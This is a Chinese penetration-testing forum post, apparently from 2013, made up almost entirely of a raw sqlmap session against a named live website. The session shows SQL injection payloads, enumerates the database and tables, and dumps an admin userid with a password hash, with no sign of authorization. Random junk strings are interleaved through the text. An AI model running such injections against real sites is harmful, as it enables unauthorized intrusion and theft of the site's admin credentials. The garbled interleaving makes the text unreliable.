中国网络渗透测试联盟
标题:
sqlmap实例注入mysql
[打印本页]
作者:
admin
时间:
2013-4-4 22:18
标题:
sqlmap实例注入mysql
D:\Python27\sqlmap>sqlmap.py -u
http://www.wepost.com.hk/article.php?id=276
--db
! z; W. }+ _& p
ms "Mysql" --current-user /* 注解:获取当前用户名称
% y* I2 }0 }2 Y7 K# q
sqlmap/0.9 - automatic SQL injection and database takeover tool
5 E" t3 ~- [5 x7 b$ [
http://sqlmap.sourceforge.net
starting at: 16:53:54
5 d# F# F. w1 M! \/ ]$ }( T
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\
www.wepost.com.hk
\session' as
- e2 ?; f& u0 I/ B. J
session file
; d4 W$ P B; j$ Z$ @! ~7 ~
[16:53:54] [INFO] resuming injection data from session file
6 J' B, f% P* b2 x
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
" J: K4 w# Q) p4 E7 J3 n! c! B
[16:53:54] [INFO] testing connection to the target url
8 n; F4 @" A( @: G
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
4 ?" `- T! M6 K: ?/ k4 l: x" u } i$ f
sts:
8 i2 M0 n$ d. W0 @1 Q P) H- \; o& C
---
# j+ R! I* Q+ t0 l
Place: GET
2 S2 X/ y' |" B6 M/ E. r# A- s. {+ P
Parameter: id
5 A! P- X2 F: f/ ]% A1 C
Type: boolean-based blind
5 R5 p; x6 T! ^ A+ e# A
Title: AND boolean-based blind - WHERE or HAVING clause
+ F H9 P: U# ?+ k
Payload: id=276 AND 799=799
/ s( g3 M- i: @0 @
Type: error-based
5 \0 T t+ _2 \/ a+ h( d) \
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
5 m8 O y j; ]/ f0 b
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
3 {# K) a O; k d
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
) q& `# P1 }( h* z( h- j2 n
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
; i$ I0 R$ U1 F4 a! B
Type: UNION query
O2 s% F, u9 L- w' i
Title: MySQL UNION query (NULL) - 1 to 10 columns
% ~+ O- q# y0 e4 V; X
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
4 X: \0 u5 ?7 w0 t# J% k! M
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
$ t$ A; I; w9 s5 c1 ~0 H+ W
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
- v* N6 q& V5 E5 O" T7 C
Type: AND/OR time-based blind
3 \# @3 D( N; t% Z* H: o
Title: MySQL > 5.0.11 AND time-based blind
5 i% c# d }2 V3 u6 M
Payload: id=276 AND SLEEP(5)
4 p. S4 K. @8 k( h! D
---
% g" i& A; U; T; c& [5 n/ T3 a+ p
[16:53:55] [INFO] the back-end DBMS is MySQL
+ }0 h+ G2 T9 D6 D: F
web server operating system: Windows
@- T, p2 A6 l- `: Q W
web application technology: Apache 2.2.11, PHP 5.3.0
5 r9 |6 v2 x3 @4 J0 b
back-end DBMS: MySQL 5.0
1 |6 t. S& k# U, g, O: r* P
[16:53:55] [INFO] fetching current user
. N/ t& ^% {9 W
current user: 'root@localhost'
. J# e% j/ [2 N8 }6 V8 Y h) B
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
- p7 K9 s" f; z* d- U/ G0 h
tput\
www.wepost.com.hk
'
shutting down at: 16:53:58
4 f4 Z$ x, B8 S0 C/ r3 Q
& e1 D% d$ U8 V1 u
D:\Python27\sqlmap>sqlmap.py -u
http://www.wepost.com.hk/article.php?id=276
--db
; k5 ^ a! ]& T6 e i# a* S
ms "Mysql" --current-db /*当前数据库
3 J: F/ p2 A& i# Q
sqlmap/0.9 - automatic SQL injection and database takeover tool
8 Y+ l/ P( }# A, c4 o+ z
http://sqlmap.sourceforge.net
starting at: 16:54:16
$ R" Y% Z5 l( p' Q4 R; |
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\
www.wepost.com.hk
\session' as
3 S+ M6 u: q0 V6 q m* `" k
session file
/ f: B5 R) q' | \- q
[16:54:16] [INFO] resuming injection data from session file
* c1 L" t1 S; f- p4 ~& D
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
! i8 B: {% f; F3 l. S
[16:54:16] [INFO] testing connection to the target url
$ _' L6 O# h/ U7 C q' a: r, L
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
5 a9 N0 R/ [$ R( ^
sts:
' N) N2 t; u: ^ S
---
1 G( e' t s! O' m
Place: GET
! J) Q) Y" V4 o: G6 o
Parameter: id
6 P' Q6 N3 y# L0 M k4 ]$ k% \* F
Type: boolean-based blind
* D+ ]8 {0 Q: u. g. D. K3 C
Title: AND boolean-based blind - WHERE or HAVING clause
( N% m p4 h, b* v% ^* R: w
Payload: id=276 AND 799=799
) a- ~6 Y: ^1 N
Type: error-based
$ K. n! s- A; o5 `# @
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
6 \4 O3 ]% X% ~
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
, \ c1 r$ |& z, {5 f5 y4 J# ^ r
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
9 R3 b1 k3 i0 u
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
6 f' I F- m: a" O" i
Type: UNION query
8 B2 g$ i) ^* t. @+ @6 z% {
Title: MySQL UNION query (NULL) - 1 to 10 columns
0 g3 L$ I( i5 ~3 H1 t
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
) o. y! o! i' X+ Y2 [" t3 }
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
+ G: N4 u, ?$ p% g; J/ J6 ?
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
. M4 [8 M* t0 d/ }8 N
Type: AND/OR time-based blind
5 I$ X6 a; t( J4 { v/ d8 h+ [5 T9 L
Title: MySQL > 5.0.11 AND time-based blind
' o" f; E* V2 @4 r4 k2 @
Payload: id=276 AND SLEEP(5)
4 U1 x# D0 c X' y4 Q
---
8 U( Q$ D3 D: D s7 i/ m8 v
[16:54:17] [INFO] the back-end DBMS is MySQL
# t+ x' l9 q9 b( T& M0 n: o
web server operating system: Windows
4 h9 `( t+ M$ B9 `: U. K
web application technology: Apache 2.2.11, PHP 5.3.0
3 a+ C6 P: M* N% w. \/ ]# `: m( Q
back-end DBMS: MySQL 5.0
8 [! ?% E: O4 V$ Q! ]* \
[16:54:17] [INFO] fetching current database
+ N0 A" v+ k D( U
current database: 'wepost'
4 b7 B' n8 l( e. F7 G4 O4 U" k1 m
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
; I& Y2 K8 T7 \9 S1 |% V
tput\
www.wepost.com.hk
'
shutting down at: 16:54:18
% @1 p: D# p0 _9 j. {2 m0 L
D:\Python27\sqlmap>sqlmap.py -u
http://www.wepost.com.hk/article.php?id=276
--db
- q0 T. T- A0 ~
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
% C+ f! a, W) ^. B/ a
sqlmap/0.9 - automatic SQL injection and database takeover tool
( l! r5 B: P4 k1 \# M
http://sqlmap.sourceforge.net
starting at: 16:55:25
$ f# \/ R) @1 x8 ~0 u
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\
www.wepost.com.hk
\session' as
9 Z; ~' I+ [- D& y
session file
0 t& P+ R! t3 S, G6 z5 I* C
[16:55:25] [INFO] resuming injection data from session file
3 L' y! \0 ]; h4 I5 Y' h
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
0 W1 ~$ ~! m3 L% X, J! e( X
[16:55:25] [INFO] testing connection to the target url
5 r; ^: h! E2 z
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
$ G' s( y8 a3 g7 ]' B
sts:
' r7 G3 Y6 t9 p; r; b
---
5 O* V9 a$ B: m% S! v' s
Place: GET
7 k$ T3 T. {' R! \' G# |
Parameter: id
# }; v u3 C* S
Type: boolean-based blind
C% J( f. Q- @
Title: AND boolean-based blind - WHERE or HAVING clause
: V1 t0 X2 Q* Z1 J6 L
Payload: id=276 AND 799=799
! `8 D2 P& t1 V+ d. N V
Type: error-based
) e/ c4 w# D4 z! w! D7 K x
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
, W' z1 X" X2 A$ w
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
* S6 d' c9 W2 h4 T6 R" j4 s% C
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
5 k d" h7 x+ f D; R6 a8 x
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
+ |5 a. A# n3 M: S
Type: UNION query
9 o0 ~' G7 L# \# f- @7 Y
Title: MySQL UNION query (NULL) - 1 to 10 columns
" |+ s+ K* U O( k u
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
( I( }7 _; F4 M( h9 P1 @8 ?) ]
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
3 H, @7 w7 T, w2 u% z g7 z
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
5 O: x/ b, B: J/ z
Type: AND/OR time-based blind
* a7 R) C1 l' G$ o. \# t+ h
Title: MySQL > 5.0.11 AND time-based blind
3 t' |) a; D+ y
Payload: id=276 AND SLEEP(5)
) N- h- {/ c6 L6 F. k. q
---
. |& N* R! f K" s& b
[16:55:26] [INFO] the back-end DBMS is MySQL
0 m2 _4 {8 p# j% x& d
web server operating system: Windows
& Z: h9 ^ ~* Q) s3 ^- n
web application technology: Apache 2.2.11, PHP 5.3.0
1 z5 |1 \9 W1 D! ]" Y/ r! \
back-end DBMS: MySQL 5.0
+ a# N, B& v1 [, T$ u
[16:55:26] [INFO] fetching tables for database 'wepost'
6 ]( ]+ ]3 ^6 @& u
[16:55:27] [INFO] the SQL query used returns 6 entries
1 u) J" _+ u6 T7 W. y8 e+ o
Database: wepost
1 ?3 J" ]) v4 a$ H* N; q
[6 tables]
- c7 T( a" X. Z
+-------------+
/ |( ~8 M0 H8 l# I: f; X/ u1 I' f
| admin |
3 D4 N( ?4 n8 k( b* L/ o
| article |
* h( C! n1 J3 f. Z% o
| contributor |
0 D' E" s# F: r# j7 Y# `5 `
| idea |
2 }1 {3 I& t0 c" b6 Y1 D
| image |
# Z% v- V. _( z' n/ |, K( t
| issue |
. s* Z z! ]& O/ I# s: S
+-------------+
) q# s# e0 X) H6 l
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
$ L1 k$ B* X% d6 p& \: ^% h
tput\
www.wepost.com.hk
'
shutting down at: 16:55:33
8 ?, x* K4 ]1 d* \: {& D7 `) b2 T( H
3 W! k% W/ G0 ~: u3 D$ h
D:\Python27\sqlmap>sqlmap.py -u
http://www.wepost.com.hk/article.php?id=276
--db
$ E7 c& r' D5 l/ ?5 p9 j- t
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
; g! d: ^6 P; I, X
sqlmap/0.9 - automatic SQL injection and database takeover tool
. {" y- \7 Y1 O9 P7 x, n/ P
http://sqlmap.sourceforge.net
starting at: 16:56:06
2 a; T2 [: b( E' A' y
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
5 ^. o/ Y h! v$ U/ T# ?+ j
sts:
+ m$ p1 b5 n: \2 f6 N- F
---
6 O, H9 Y5 b2 j/ s/ B/ |7 O
Place: GET
# }0 b6 I4 ^, r& p4 t
Parameter: id
% j7 S+ ^$ w8 U( j; J& g7 D
Type: boolean-based blind
t# Y, P* }$ @ K; }& V2 Y4 y
Title: AND boolean-based blind - WHERE or HAVING clause
3 E; r I/ t: X* H" G
Payload: id=276 AND 799=799
* O8 j) [ N' d+ c
Type: error-based
' U3 t) n5 P+ p. J' `
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
8 ~4 N$ x. ?0 a; k1 ?
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
! j5 B) O' f7 D+ Q- K: s' X h
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
: ]; e, t1 k6 S4 r+ V3 i6 S7 q5 Z
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
8 w" Y& j& c$ V. U; c
Type: UNION query
n9 L+ d$ F9 E: R; z7 n$ W
Title: MySQL UNION query (NULL) - 1 to 10 columns
- ?9 ?" f {: T( C- i7 ^
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
j+ S) i# n8 Y& ?; @" J9 c: u
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
, d8 a: f, {5 ]# D5 X. {( H1 J
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
6 }& q7 G u. P3 ? o2 Z
Type: AND/OR time-based blind
5 m" Q7 K4 p, m' q6 {% P" w1 Q
Title: MySQL > 5.0.11 AND time-based blind
Q& F( k8 ^9 r* f9 |% h. k- t" `
Payload: id=276 AND SLEEP(5)
- N& J: `/ c( C
---
- O0 y5 }; _1 v$ V# z
web server operating system: Windows
7 D+ A h' f2 b9 l8 F
web application technology: Apache 2.2.11, PHP 5.3.0
2 \% C7 q0 M8 d2 a U
back-end DBMS: MySQL 5.0
; U0 Q: W8 Y% i. W2 e7 ?- Y0 p1 ~
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\
www.wepost.com.hk
\se
/ g& l/ v9 l6 Y0 u) E) r+ F# U! m
ssion': wepost, wepost
3 m* B7 s2 [6 T9 ^2 p
Database: wepost
" W- h. ~6 S9 Z+ H5 R7 }
Table: admin
) [0 X7 e; z2 t4 L+ u
[4 columns]
x5 ~: N6 B, f: q' l! B3 `2 G
+----------+-------------+
& U! P$ v' Q. q6 m, M# m
| Column | Type |
- t' S! y0 ~+ z, f* r$ M
+----------+-------------+
* @8 {6 f( Z1 u* p3 e: x$ p3 Y0 X
| id | int(11) |
% p1 L. o- d4 y) G$ q
| password | varchar(32) |
: X& y; a4 g) ^: |; s, H, v
| type | varchar(10) |
. j. B6 r5 a) E
| userid | varchar(20) |
5 I+ W$ m& g# V7 s; u
+----------+-------------+
! ?: A) a, a( H( a% |3 V; O
shutting down at: 16:56:19
; h% m8 K3 r: m" o( `$ A. y) C
3 `" w# b- C+ J5 ?$ {
D:\Python27\sqlmap>sqlmap.py -u
http://www.wepost.com.hk/article.php?id=276
--db
# }* g( ]' V4 [
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
6 ^! k5 L& i! k% |
sqlmap/0.9 - automatic SQL injection and database takeover tool
& B* A0 @6 @! C1 T; r0 e& w! x
http://sqlmap.sourceforge.net
starting at: 16:57:14
5 |# D4 w5 f; N& k# K2 D& |: m
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
: ], a8 ?+ [' a& w4 k
sts:
: w" S% z. O8 \9 y2 A8 L, q
---
) U/ J; P$ g4 Z$ `% {
Place: GET
1 `9 b- G1 N& B. q
Parameter: id
5 p1 @( y4 n+ j: P! h2 t- X
Type: boolean-based blind
X0 R; v1 d7 E) M' ]
Title: AND boolean-based blind - WHERE or HAVING clause
" B! {) ~5 M: {. l; O
Payload: id=276 AND 799=799
' o% A0 W2 R' O* C6 l5 F
Type: error-based
9 `5 N- n. k6 W9 v3 S
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
$ {' u# W6 b4 U
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
0 D& {0 o, J4 _( S' R$ p
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
6 i, K0 L& z5 [: v& z
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
" P, Z7 Q" B# k
Type: UNION query
) Y+ ]4 o2 {% w
Title: MySQL UNION query (NULL) - 1 to 10 columns
- y5 `! u, w4 O* p2 K3 I
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
9 R$ X6 V: \$ V8 Q
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
! j+ D$ i! p( e9 r) Y3 w+ \
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
8 ]2 Q( s4 j; V* _% Q
Type: AND/OR time-based blind
7 J! n; k( h! R" L) _
Title: MySQL > 5.0.11 AND time-based blind
; Z( L) f& T2 i, p+ Q" u
Payload: id=276 AND SLEEP(5)
4 r" T: P0 b0 F% S9 [7 @0 X
---
+ j1 `% g0 y$ [
web server operating system: Windows
1 N% g5 x) \3 V/ w! D5 F
web application technology: Apache 2.2.11, PHP 5.3.0
- r. z: ] o) ~% z) u
back-end DBMS: MySQL 5.0
+ B4 J/ a6 }# A/ j5 q
recognized possible password hash values. do you want to use dictionary attack o
5 X9 q# ]" P5 E) X8 {# `- R# \' P. P3 ]
n retrieved table items? [Y/n/q] y
- y2 M6 h9 B: H- v2 m3 C# N* `; E
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
' S8 T+ A( g* s0 E- C% C$ e
do you want to use common password suffixes? (slow!) [y/N] y
- i$ ~# S0 f- c z; @/ b
Database: wepost
2 m1 K% N; K4 J# f# B% ~
Table: admin
|: n* M* P! h3 D/ u$ i
[1 entry]
5 `4 F! W: i6 u5 g
+----------------------------------+------------+
' H0 V4 M/ G q) o7 A* d( C" B
| password | userid |
$ S; O6 F3 G5 g$ ~' ^7 V$ m1 d5 n0 |
+----------------------------------+------------+
; C& M" l' l; U& ]2 o1 u& Y
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
" N0 y- _4 i! u8 `1 Y( S
+----------------------------------+------------+
/ P4 S6 p" g/ |8 `) G
shutting down at: 16:58:14
) Y% q3 e$ Y% c
9 E( w+ k) N6 |( V! b* E
D:\Python27\sqlmap>
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2